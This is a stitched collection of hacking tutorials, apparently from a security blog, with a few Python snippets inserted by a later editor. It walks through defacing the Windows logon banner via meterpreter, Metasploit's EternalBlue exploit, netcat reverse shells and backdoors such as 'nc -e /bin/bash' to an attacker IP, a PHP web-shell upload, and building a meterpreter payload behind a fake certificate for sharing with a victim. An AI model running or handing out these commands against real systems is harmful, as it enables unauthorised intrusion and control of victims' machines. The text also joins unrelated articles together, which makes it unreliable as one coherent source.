Hack Legal Notice Caption of Remote PC

Registry keys play an important role in the operating system. An attacker can abuse the legal notice registry values to plant a threatening message on the targeted system: once the system boots, the user reads a message such as "your system has been hacked" before the login screen appears.

In this article we show how an attacker sends such a message to the logon screen of the targeted users.
Let's start
Attacker: Kali Linux
Target: Windows 7

Read our previous article on how to hack Windows 7 and get a meterpreter session on the victim. Inside meterpreter there are many post-exploitation options; type the following command to enumerate the registry key on the victim's system:

meterpreter > reg enumkey -k HKEY_LOCAL_MACHINE\\SOFTWARE\\MICROSOFT\\Windows\\CurrentVersion\\Policies\\System

From the screenshot you can observe that it contains 2 keys (Audit, UIPI) and 18 different values. The highlighted box marks our targeted values:

i) legalnoticecaption

ii) legalnoticetext


Now type another command to assign the value of legalnoticecaption, which provides the title or heading of the message shown on the logon screen.
meterpreter > reg setval -k HKEY_LOCAL_MACHINE\\SOFTWARE\\MICROSOFT\\Windows\\CurrentVersion\\Policies\\System -v legalnoticecaption -d "IMPORTANT MESSAGE"
From the screenshot you can read that our registry value was set successfully.


Now type one more command to give the warning message to the targeted system by assigning the value of legalnoticetext, which displays your message on the logon screen of the victim's system.

meterpreter > reg setval -k HKEY_LOCAL_MACHINE\\SOFTWARE\\MICROSOFT\\Windows\\CurrentVersion\\Policies\\System -v legalnoticetext -d "PWNED BY RAJ CHANDEL"

From the screenshot you can read that, again, our registry value was set successfully.

Here -k denotes the key, -v the value name and -d the data to write.


Now when the victim starts the system, the message appears on the logon screen as shown in the given screenshot.
Try it yourself!!!

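A defender's counterpart to the commands above, as an added example that is not part of the original article: it parses the output of Windows' own "reg query" on the same Policies\System key and reports when the two legal-notice values differ from an approved baseline (the sample output, the baseline text and the function names are constructed for illustration).

```python
import re

# Constructed sample in the shape printed by "reg query <key>" for the key the
# article modifies (not the original page's screenshot; data chosen to match it).
SAMPLE_REG_QUERY = """
HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System
    ConsentPromptBehaviorAdmin    REG_DWORD    0x5
    EnableLUA    REG_DWORD    0x1
    legalnoticecaption    REG_SZ    IMPORTANT MESSAGE
    legalnoticetext    REG_SZ    PWNED BY RAJ CHANDEL
"""

# Hypothetical baseline: the banner the organisation actually approved.
APPROVED_BANNER = {
    "legalnoticecaption": "Authorised use only",
    "legalnoticetext": "This system is monitored. Disconnect if you are not authorised.",
}

# reg query prints value lines as: <indent> name <4 spaces> type <4 spaces> data
VALUE_LINE = re.compile(r"^\s{2,}(\S+)\s{2,}(REG_\w+)\s{2,}(.*)$")


def parse_reg_query(text):
    """Return {value_name.lower(): (type, data)} for every value line in the output."""
    values = {}
    for line in text.splitlines():
        m = VALUE_LINE.match(line)
        if m:
            values[m.group(1).lower()] = (m.group(2), m.group(3).rstrip())
    return values


def check_logon_banner(text, approved=APPROVED_BANNER):
    """Compare the two legal-notice values against the baseline.
    Returns [(value_name, current_data)] for each value that deviates; a missing
    value is reported with an empty string so a cleared banner is noticed too."""
    values = parse_reg_query(text)
    return [
        (name, values.get(name, ("", ""))[1])
        for name, expected in approved.items()
        if values.get(name, ("", ""))[1] != expected
    ]
```

Feed the text of "reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" (collected locally or through endpoint tooling) to check_logon_banner; a non-empty result is worth investigating, because an attacker with a meterpreter session can change these values without any other visible change on the host.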
How to set up SQLI Lab in Kali

Hello everyone, with the joy of having a new Kali version, a few of us are having a hard time setting up the Dhakkan (AUDI-1) SQL series lab on our Kali machines.

So today we'll learn how to set up the Dhakkan lab (one of the best labs I have seen for practicing and understanding SQL INJECTION) on the latest Kali machine.
Download from here

Q - Why is it not as simple as it was in older versions of Kali?
Ans - The latest version of Kali ships PHP 7.x, which no longer supports the old mysql_* functions; it supports the MySQLi functions instead.


The MySQLi extension (MySQL improved, or simply MySQLi) is a relational database driver used mainly in the PHP programming language.


So we have 2 ways to set it up:

1- Downgrade your PHP version to 5.x
2- Change the code of the original Dhakkan lab to make it work with the latest Kali.
We'll change the code of the labs.

Q- How did I come to know that this is the issue?
Ans - When I set up my lab and browsed it, I saw I was unable to set up the required database. See the screenshot below.


In the above screenshot look at the URL. So now I know something is wrong in setup-db.php, so I tried to run this specific file in my Kali; see the screenshot.



After googling the error I came to know that I have to replace mysql_connect() with mysqli_connect().

After making this change, when I ran setup.php again I came across a new error; see the screenshot.


So I replaced mysql_query($sql) with mysqli_query($con, $sql)
($con is the connection link we made to our database). If you don't know PHP, don't worry: simply replace mysql_query($sql) with mysqli_query($con, $sql).
So this is how I debugged the issue.
Now I am summarizing the changes that I made and that you have to make to set up your lab.
Simply use Ctrl+F and the replace-all feature to make the changes at a fast pace.
You have to make the changes in index.php of ALL lessons, in the other PHP files in the lessons and in all PHP files present in the sql-connections folder.
(Or you can contact me to get the edited lab)
S.No  Replace                               Replace By
1     mysql_query($sql)                     mysqli_query($con, $sql)
2     mysql_error()                         mysqli_error($con)
3     mysql_fetch_array($result)            mysqli_fetch_array($result, MYSQLI_BOTH)
4     mysql_fetch_array($result1)           mysqli_fetch_array($result1, MYSQLI_BOTH)
5     mysql_connect($host,$dbuser,$dbpass)  mysqli_connect($host,$dbuser,$dbpass)
6     mysql_real_escape_string($value)      mysqli_real_escape_string($con, $value)
7     mysql_select_db($dbname, $con)        mysqli_select_db($con, $dbname)

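Rather than hand-editing every lesson with Ctrl+F, the table can be applied as a script. This is an added helper (not part of the Dhakkan lab) that rewrites the calls from the table above across PHP source; it generalises rows 3 and 4 to any variable name inside the parentheses, and assumes, as the table does, that the connection handle is named $con and that the lab's calls use the single-argument form.

```python
import re
from pathlib import Path

# One (pattern, replacement) pair per table row; \b keeps "mysqli_*" from re-matching,
# so the rewrite is idempotent.
RULES = [
    (r"\bmysql_connect\(", "mysqli_connect("),
    (r"\bmysql_select_db\(([^(),]+),\s*([^()]+)\)", r"mysqli_select_db(\2, \1)"),
    (r"\bmysql_query\(([^()]*)\)", r"mysqli_query($con, \1)"),
    (r"\bmysql_error\(\)", "mysqli_error($con)"),
    (r"\bmysql_fetch_array\(([^()]*)\)", r"mysqli_fetch_array(\1, MYSQLI_BOTH)"),
    (r"\bmysql_real_escape_string\(([^()]*)\)", r"mysqli_real_escape_string($con, \1)"),
]


def migrate_source(php):
    """Rewrite legacy mysql_* calls in one PHP source string."""
    for pattern, repl in RULES:
        php = re.sub(pattern, repl, php)
    return php


def migrate_tree(root):
    """Rewrite every .php file under root in place; returns the number of files changed."""
    changed = 0
    for path in Path(root).rglob("*.php"):
        original = path.read_text(encoding="utf-8", errors="replace")
        updated = migrate_source(original)
        if updated != original:
            path.write_text(updated, encoding="utf-8")
            changed += 1
    return changed


# Constructed sample in the shape of the lab's sql-connections code (not the lab's file).
SAMPLE_PHP = """<?php
$con = mysql_connect($host,$dbuser,$dbpass);
mysql_select_db($dbname, $con);
$result = mysql_query($sql);
$row = mysql_fetch_array($result1);
echo mysql_error();
$id = mysql_real_escape_string($value);
"""
```

Run migrate_tree("/var/www/html/sqlilabs") once after copying the lab; calls already in mysqli_ form are left untouched, so running it twice is harmless.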
After making the above changes, copy the complete sqli-labs folder into the /var/www/html folder of Kali.

Now open a Kali terminal and move to this folder using the command "cd /var/www/html".


Now give permissions to the sqlilabs folder using the command "chmod 777 sqlilabs".


Now move to the sqlilabs folder using the command "cd sqlilabs" and give permissions to all files and folders in it using the command "chmod 777 *".


Now your lab is ready to use; you can access it in your browser at http://<IP of your Kali machine>/sqlilabs.


Click on Setup/reset Database for labs.



Database set! Now practice, enjoy and use your skills to help organizations secure their apps and applications from hackers. Don't test it on sites for which you don't have written permission to do so; it is illegal, and you may end up behind bars and ruin your career.

We are very thankful to Audi-1 (aka Dhakkan) for creating such an interesting and awesome environment for us to understand and practice SQL injection.

Exploit Windows PC using EternalBlue SMB Remote Windows Kernel Pool Corruption

This module is a port of the Equation Group ETERNALBLUE exploit, part of the FuzzBunch toolkit released by Shadow Brokers. There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size is calculated in Srv!SrvOs2FeaListSizeToNt, with a mathematical error where a DWORD is subtracted into a WORD. The kernel pool is groomed so that the overflow is well laid out to overwrite an SMBv1 buffer. The actual RIP hijack is later completed in srvnet!SrvNetWskReceiveComplete. This exploit, like the original, may not trigger 100% of the time, and should be run continuously until triggered. It seems like the pool gets hot streaks and needs a cool-down period before the shells rain in again.

Let's start!!!
Attacker: Kali Linux
Target: Windows 7

Open the terminal in your Kali Linux and type msfconsole to load the Metasploit framework.

msfconsole

msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > set rhost 192.168.1.8
msf exploit(ms17_010_eternalblue) > set lhost 192.168.1.21
msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(ms17_010_eternalblue) > exploit

From the screenshot you can see we got a meterpreter session after the buffer overflow was exploited by overwriting the SMBv1 buffer.
meterpreter > sysinfo

Netcat Tutorials for Beginner

In the field of hacking, the most utilized and powerful tool used by attackers is popularly known as "Netcat", a computer networking utility for reading from and writing to network connections using TCP or UDP. Netcat is designed to be a dependable back-end that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and investigation tool, since it can create almost any kind of connection its user could need and has a number of built-in capabilities.

Netcat is at the same time very simple and multipurpose; it's like trying to explain everything you can do with your Swiss Army knife.
For example:

· Banner grabbing
· Bind shell (backdoor)
· Chatting
· File uploading and downloading
· Port scanning
· Port knocking
· Port forwarding
· Show webserver HTTP file contents

There are many options inside netcat to enhance its function; you will see them when you type nc -h in the terminal of Kali Linux. Before getting into the working details, be aware that here we use two systems, one as the attacker and another as the target.
Let's begin

Port Knocking

Open the terminal of your Kali Linux and type the following command, which contains the target's IP and port number.
nc 192.168.1.21 2222

When the command is executed it reveals the service running on that port; from the image below you can observe that port 2222 is open for SSH.


Reverse Shell

Attackers mainly use netcat as a backdoor for gaining unauthorized access to the target's system: the attacker starts a listening port (any port) and, once a vulnerable target is found, makes it connect back.

nc -e /bin/bash 192.168.1.21 4444

The command above makes the victim's system connect back to the attacker's listener, which waits for the reverse connection on port 4444.
In the given screenshot you can see the running website suffers from an OS command injection vulnerability; now use nc -e /bin/bash 192.168.1.21 4444 to establish the connection between the victim's and the attacker's system, which allows unauthorized access by creating a backdoor.


Here you can see that we (the attacker) successfully accessed the victim's shell through netcat.


Netcat as a Backdoor
Download netcat.exe for Windows and type the following command:
nc.exe 192.168.1.21 4444 -e cmd.exe


From the given screenshot you can perceive that the attacker successfully connected to the Windows client through netcat, listening with:
nc -lvp 4444


File Upload Exploitation
We will look at how an attacker can exploit a file upload vulnerability through a netcat shell. From the given image it is clear that the targeted webserver allows its clients to upload an image.


For uploading we use php-reverse-shell.php, which is a PHP backdoor, instead of an image. Open this web shell to edit the listener IP, i.e. your Kali Linux IP (192.168.1.21), and then start netcat with the following command, which waits for the reverse connection from the victim's system.
nc -lvp 1234


Now upload your PHP backdoor to the web server and execute the file, which connects the victim's system back to the attacker machine.


Hence you can see the attacker successfully made unauthorized access through the netcat shell.


HTTP Request

Use Netcat to fetch web page information from a webserver. With Netcat you can pull the full HTTP header, so you can see which server software is running a particular site. Now type the following command, which makes a connection to port 80, then send the request line followed by an empty line:

nc 192.168.1.11 80
OPTIONS / HTTP/1.0

From the screenshot you can read the details of the HTTP header of the targeted website.


Port Scanning
Netcat can also scan TCP & UDP ports, hence it can be used in place of NMAP to tell us about the open and closed ports of the targeted IP.

The command used takes the target IP and a port range, with the following options:

-z: zero-I/O mode [used for scanning]
-w: timeout for connects and final net reads
-v: verbose
-l: listen mode, for inbound connects
-n: numeric-only IP addresses


From the resulting image you can see the open ports with their running services.


Chatting
Netcat is also used for chatting between two systems. We set up Netcat to listen on a specific port on one system and connect to that address and port from the other.

nc -lvp 5678


nc 192.168.1.21 5678
Hi
How are you
Visit www.hackingarticles.in


File Transfer
As you know, in Windows we downloaded the netcat.exe file; here I use it to upload a text file t.txt to the targeted system through a specific port.

nc 192.168.1.21 5555 < t.txt


The receiver downloads that t.txt file by listening on the same port number, which establishes the connection between both systems (the listener must be started before the sender runs).
nc -lvp 5555 > /root/Desktop/t.txt

Exploit Remote PC with SSL Certified Meterpreter Payload using MPM

In this article you can learn how an attacker is able to generate an SSL certificate for an exe or bat payload so that he can establish a connection with the host through a meterpreter session.

A firewall doing SSL inspection intercepts the network traffic and verifies trusted certificates in order to insert itself as a trusted third party into the session between the client and the server. When the client begins an SSL session with the server, the firewall captures the client's SSL request and forwards it to the server. The server sends a certificate for the client, which is captured by the firewall. If the server certificate is signed by a CA that the firewall trusts, the firewall generates a duplicate of the server certificate signed by the Forward Trust certificate and forwards that certificate to the client to authenticate.

Meterpreter_Paranoid_Mode.sh lets you secure your staged/stageless Meterpreter connection by having the payload check the certificate of the handler it is connecting to.

Open the terminal in your Kali Linux and type the following to download it…



Once it is downloaded, run the program file and follow the steps given below.

Press enter to continue



A prompt opens in which you have to choose an option for building the certificate; from the given screenshot you can read that I chose impersonate domain.

We start by generating a certificate in PEM format; once the certs have been created we can create an HTTP, HTTPS or EXE payload and give it the path of the PEM certificate to be used to validate the connection.

After that another prompt opens in which you are asked to enter the domain name; here the SSL certificate is generated for www.hackingarticles.in.


To have the connection validated we need to tell the payload what certificate the handler will be using by setting the path to the PEM certificate in the HANDLERSSLCERT option; then we enable the checking of this certificate by setting stagerverifysslcert to true.

PEM is a widely used encoding format for security certificates. Syntax and content are defined by the X.509 v3 standard for digital certificates, specified in IETF RFC 5280. The main file extensions are .pem, .crt and .ca-bundle. A PEM certificate is a base64 (ASCII) encoded block of data encapsulated between.
In the next prompt choose the payload category for auto-building the payload; from the given list I chose stageless (payload.exe).


Once that payload is created we need to create a handler to receive the connection, and again we use the PEM certificate so the handler can use its SHA1 hash for validation. Just like with the payload we set the parameters HANDLERSSLCERT with the path to the PEM file and stagerverifysslcert to true.
We can see the stager doing the validation when we receive a session back.

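The validation described here rests on pinning the handler certificate's SHA1 fingerprint, which is why a duplicate certificate re-signed by an inspecting firewall (as in the first paragraph) fails the check. The following is an added illustration of that check, not Metasploit's own code; the certificate bodies are constructed placeholders rather than real X.509 data, and all function names are assumptions.

```python
import base64
import hashlib
import hmac


def pem_to_der(pem):
    """Strip the PEM armour and base64-decode the certificate body to DER bytes."""
    lines = [ln.strip() for ln in pem.strip().splitlines()]
    if lines[0] != "-----BEGIN CERTIFICATE-----" or lines[-1] != "-----END CERTIFICATE-----":
        raise ValueError("not a PEM certificate")
    return base64.b64decode("".join(lines[1:-1]))


def sha1_fingerprint(der):
    """Colon-separated upper-case SHA1 fingerprint, as printed by openssl x509 -fingerprint."""
    digest = hashlib.sha1(der).hexdigest().upper()
    return ":".join(digest[i:i + 2] for i in range(0, len(digest), 2))


def handler_cert_ok(presented_der, pinned_fingerprint):
    """Stager-side check: accept the handler only if the certificate it presents hashes
    to the fingerprint pinned from the PEM file at build time (constant-time compare)."""
    return hmac.compare_digest(sha1_fingerprint(presented_der), pinned_fingerprint.upper())


# Constructed placeholder DER bodies (not real certificates): one for the handler,
# one standing in for what an intercepting proxy would re-sign and present instead.
HANDLER_PEM = ("-----BEGIN CERTIFICATE-----\n"
               + base64.b64encode(b"constructed handler certificate DER").decode()
               + "\n-----END CERTIFICATE-----\n")
PROXY_DER = b"constructed re-signed certificate DER"


def demo():
    """Pin the handler cert, then test the genuine cert and the proxy's substitute."""
    pin = sha1_fingerprint(pem_to_der(HANDLER_PEM))
    return (handler_cert_ok(pem_to_der(HANDLER_PEM), pin),  # True: same certificate
            handler_cert_ok(PROXY_DER, pin))                  # False: re-signed copy
```

A proxy can only pass this check by presenting the handler's exact certificate bytes, which it does not have; the trade-off is that rotating the handler certificate invalidates every payload built with the old pin.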
Enter LHOST 192.168.0.108 (attacker's IP)


Similarly, give any random port for the reverse connection from the host system and click on OK.
Enter lport 8888


Again a list of payloads opens; from that prompt choose the desired payload, which generates the payload for the attack.
Windows/meterpreter_reverse_http


This configures all settings and starts the multi handler by launching the Metasploit framework.


When you move inside the output folder you will find two files: one is the exe payload and the other the .pem certificate. Now make your effort to share the exe file with your victim and wait for the session to be established through meterpreter.


On the other hand, you can compare the .pem certificate with an original CA-signed certificate; if you observe the image below you can read the certificate details for hackingarticles.in, which look similar to those of CA-signed certificates.


Hence you can see I have successfully established the meterpreter session with the victim's system.
Try it by yourself!!!